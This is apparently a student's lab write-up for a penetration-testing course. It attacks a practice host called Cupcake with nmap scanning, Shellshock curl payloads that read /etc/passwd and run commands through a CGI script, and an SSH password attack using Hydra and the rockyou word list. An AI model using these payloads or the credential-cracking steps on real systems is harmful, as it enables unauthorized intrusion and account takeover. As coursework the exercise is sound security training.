Activity 4.1: Exploiting Cupcake

Part 1: Active Recon

The target is cupcake.shire.org at 10.0.5.23

• Make sure to check the top 100 TCP ports to see what ports are listening

For those ports that are open, run another scan that attempts to run version detection against the service port.

• sudo nmap -sV -p 80 10.0.5.23

Deliverable 1. Provide a screenshot of your team's version detection scan(s).

Deliverable 2. Examine any applications that are publicly accessible. Report on what you find.

• The orginal scan only came up withhttp but in the scan below using -A we found that 22/tcpOpenSSH 5.3 was also publically accessible.

Deliverable 3. You should have the versions of at least two applications. Go ahead and hit the internet and see if your group can find:

1. Related operating system (this is easy) Linux (Centos)

2. Release (a bit harder) Apache 2.2.15

When running -A, we were able to find OpenSSH(22) and port 80 as open.

https://lists.apache.org/thread/7lw0j6023cfk35fy14q2f9tbgyn6lpmjlists.apache.org

Part 2 - Dealing with Targets and Scans

Install nmaptocsv

• sudo apt update

• sudo apt install python3-pip

• sudo pip install nmaptocsv

Organize the results of your scans

• TARGET=10.0.5.23; sudo nmap -sT -sV --top-ports=100 $TARGET -Pn -oG top100.txt

• Cat top100.txt to see the output of the command in the file

• Organize the results of your scans nmaptocsv -i top100.txt -d "."

  • this will organize the results into a CSV format

• Copy paste the results into spreadsheets, and it will be formatted nicely!

Deliverable 4. Provide a screenshot similar to the one below that shows your exported googlesheet of nmap scan data against cupcake.

Pasted output of the scan into google spreadsheets

Part 3: Vulnerability Detection

Apache 2.1.15 VulnerabilitiesOpenSSH 5.3 Vulnerabilities

Deliverable 5. What potential remote vulnerabilities did your team find?

Part 4 - Remote Code Execution Vulnerability

Testing the Vulnerability

Just because your research indicated the potential of a vulnerability, let's see if we can confirm it both by hand and by use of an nmap script

Deliverable 6. Using the following screenshot as a point of departure. Determine what the target's running kernel version (you would use the uname command for this). Provide a screenshot that shows the major and minor release of the kernel.

• Kernel is 2.6.32-431.el6.x86_64

shows kernal version

Deliverable 7. The following technique exposes the OS release. Show similar screenshots that show:

Example from deliverable showing command that shows the OS release

/usr/bin/whoami

curl -H 'User-Agent: () { :; }; echo ; /usr/bin/whoami' bash -s http://10.0.5.23/cgi-bin/status

• The command above executes code into a vulnerable script with the shellshock vulnerability.

• curl transfers data from or to a sever using protocols like HTTP/HTTPS

• -H 'User-Agent: () { :; }; echo ; /user/bin/whami

  • -H adds an http header to the request

  • 'User-Agent: sets the user-agent http header (which identifies the client making the request

  • () { :; }; the malicious part of the command that exploits the shellshock vulnerability

  • echo ; /usr/bin/whoami the part of the code the attacker would manipulate. echo is discarded by the system, and the part that is read is the command that follows, in this case whoami

whoami

/sbin/ifconfig

• curl -H 'User-Agent: () { :; }; echo ; /sbin/ifconifg' http://10.0.5.23/cgi-bin/status

  • ifconfighas a different path then cat so we have to do /sbin/ifconfig

results of running ifconfig

code behind the status cgi

• curl -H 'User-Agent: () { :; }; echo ; /bin/cat *' http://10.0.5.23/cgi-bin/status

  • here we are using a wildcard * to read all the files in thecgi-bin/status

  • this works since there is only one file, so when we use the wildcard that would read all files in a directory, it just reads the only file that we are scanning cgi-bin/status

the code behind the status cgi

contents of /etc/passwd

• curl -H 'User-Agent: () { :; }; echo ; /bin/cat /etc/passwd' http://10.0.5.23/cgi-bin/status

  • you need 2 commands here since you want to catthe contents of /etc/passwd

  • /bin/cat and /etc/passwd

/etc/password

Part 5: The foothold

There is a list of most common passwords on kali in the file /usr/share/wordlists/rockyou.txt.gz

• Unzip the file and output the contents into a text file

  • zcat /usr/share/wordlists/rockyou.txt.gz CommonPasswords.txt

Most common pass word list, unzipped with zcat

We have the username samwise and we are assuming that the username is part of the password.

• cat CommonPasswords.txt | grep samwise -i

Deliverable 8. Armed with the contents of /etc/passwd, let's see if we can build a list of likely passwords for the target account. You should end up with 28 passwords in your list. Provide a screenshot that shows how you generated the list as well as the list contents.

grepping the password list

• Put the grepped passwords into a file

  • cat CommonPasswords.txt | grep samwise > samwise_passwords.txt

saving the passwords into a file

Use Hydra to Crack the Password!

Deliverable 9. Show a screenshot of your hydra session as well as a ssh login session using the targeted account. Also dump the contents of user-flag.txt using cat or more.

• sudo hydra -l samwise -P samwise_passwords2.txt 10.0.5.23 -t 4 ssh

Password for Samwise with Hydra

SSH to Cupcake with the username

Successful SSH into Cupcake with samwise@10.0.5.23

Cat the User Flag file